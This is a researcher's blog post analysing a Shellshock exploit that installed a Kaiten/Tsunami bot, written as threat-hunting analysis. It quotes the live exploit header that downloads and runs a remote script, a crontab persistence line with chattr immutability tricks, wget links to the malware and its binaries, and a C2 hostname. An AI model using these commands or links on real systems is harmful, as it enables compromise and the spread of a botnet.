Greetings,
This blog post brought to you in part by: MalwareMustDie. I must thank them for their assistance on this one.
Today, I came in and found around 300+ shellshock payloads. as I groggily looked through most of them, noting the same old vulnerability touches and payloads already documented in project OverWatch, I found an alert that caught my eye:
5.249.147.134 threw this at me:
GET /nodeworx/ HTTP/1.0
HOST:xxx.xxx.xxx.xxx:2443
User-Agent: () { :;}; /bin/bash -c "curl -o /tmp/.a http://205.237.100.171/manual/init;fetch -o /tmp/.a http://205.237.100.171/manual/init;wget http://205.237.100.171/manual/init -O /tmp/.a;sh /tmp/.a;rm -rf /tmp/.a"
Awesome. A new toy to play with. Let's pull down the payload:
wget http://205.237.100.171/manual/init
looks like it's a shell script. Reading through the script, reveals the following:
1) attempts to install gcc and php (both via yum or apt-get -- to ensure maximum spread across linux distros?)
2) adds 4.2.2.2 as a DNS server in resolv.conf -- Level 3 communications public DNS server. Commonly used DNS server worldwide to ensure domain name resolution
3) appends the line "wget http://stablehost.us/bots/regular.bot" to either /etc/rc.d/init.d/sshd or /etc/init.d/ssh
-- this file, "regular.bot" is a persistence mechanism. It instructs the machine to compile a file downloaded from 205.237.100.171, a.c , into a binary in /tmp, execute it and delete it. This ensures persistence and if the source code is changed (say, to reflect a new CNC), the bot is updated.
4) several pre-compiled payloads of the same bot, for different platforms are downloaded and execution is attempted. Additionally, the source file "a.c" is downloaded in this script, compiled, and executed
5) to further enable persistence, this line is added to root's crontab:
@weekly wget http://stablehost.us/bots/regular.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh >/dev/null 2>&1
Just like with the lines appended to ssh and sshd, this is a persistence mechanism. What's interesting is this line:
chattr +isa /var/spool/cron/tabs/root
+i makes the file immutable. This is a common persistence mechanism for penetration testers. The file cannot be deleted in any way until the +i flag is removed and because chattr (change attribute is so uncommon, most won't think to look for it or know how to remove it. Tip: lsattr allows you to list chattr attributes on a file.
+s ensures secure file deletion if the file is deleted.
+a allows the file to be appended to.
5) finally, a cron.weekly entry is made for "00logrotate" that performs the same actions as the weekly root crontab, and gets the same chattr +isa treatment.
What gets me is that these actors perform such great measures for persistence, but then COMPLETELY FAIL to protect the source code for their bot (zero obfuscation), fail to statically compile the bot in case required libs are NOT on the system, etc. Their loss is our gain.
Here are some links for the curious:
wget http://205.237.100.171/manual/init <-- main script
wget http://stablehost.us/bots/regular.bot <-- persistence script
wget http://205.237.100.171/manual/a.c <-- kaiten bot source code
wget http://205.237.100.171/manual/b <-- x86_64 compilation
wget http://205.237.100.171/manual/arm <-- ARM compilation
wget http://205.237.100.171/manual/mipsel1 < -- MIPS compilation
wget http://205.237.100.171/manual/dh <-- see below.. this one is fun.
wget http://205.237.100.171/manual/tmp.gz <-- see below.. more fun!
I submitted the sha1sum of the file "b" to virustotal to see if it was already uploaded. Looks like someone beat me to the punch by a few hours:
https://www.virustotal.com/en/file/0f83934ec16c40aea7877f5faedc2b935e3d881e9a2cde36e7fe163cdea3723b/analysis/
VT mentions that this bot is known as kaiten/tsunami, no doubt in reference to the source code and/or tsunami ddos the bot can perform.
The arm/mips variants were a bit of a concern to me. This is one of the few times outside of the Zollard botnet I've seen variants of a bot precompiled for other CPU architectures -- arm and mips in this case.
It is worrying because while shellshock has been patched on a wide variety of major platforms, embedded devices and/or SOHO devices with the bash shell remain vulnerable to shellshock and likely will continue to remain vulnerable indefinitely in most cases.
I decided to consult with MMD on this case, as I recall hearing about Tsunami/Kaiten through them a while ago. It appears that this is commonplace for kaiten botnet and the source code is there to allow compilation on any platform. Additionally they made me aware of additional payloads the bot is capable of delivering for spreading deeper into targeted networks:
the dh file above is a variant of the shellshock over DHCP exploit that has already been seen via trustedsec as a perl module. If this were to be loaded on a SOHO device/router in a target network, the avenue for exploitation and pivoting deeper into a target network is much greater... if that device has a python interpreter.
the tmp.gz file is actually a tar.gz file. It contains pnscan, port scanner commonly packaged with DDOS bots. additionally this tarball contains bash.php, a php script that contains the initial exploit payload that points to 205.237.100.171/init via shellshock exploitation. If you want the payload, grab it now, I'm following up with the provider for that IP address to get this remediated as soon as possible.
The C source mentions x.secureshellz.net I'm fairly certain this is the botnet CnC. or was. I couldn't connect to it via irssi. May need to detonate it later to confirm.
Happy Hunting,
WeAreTheArtillery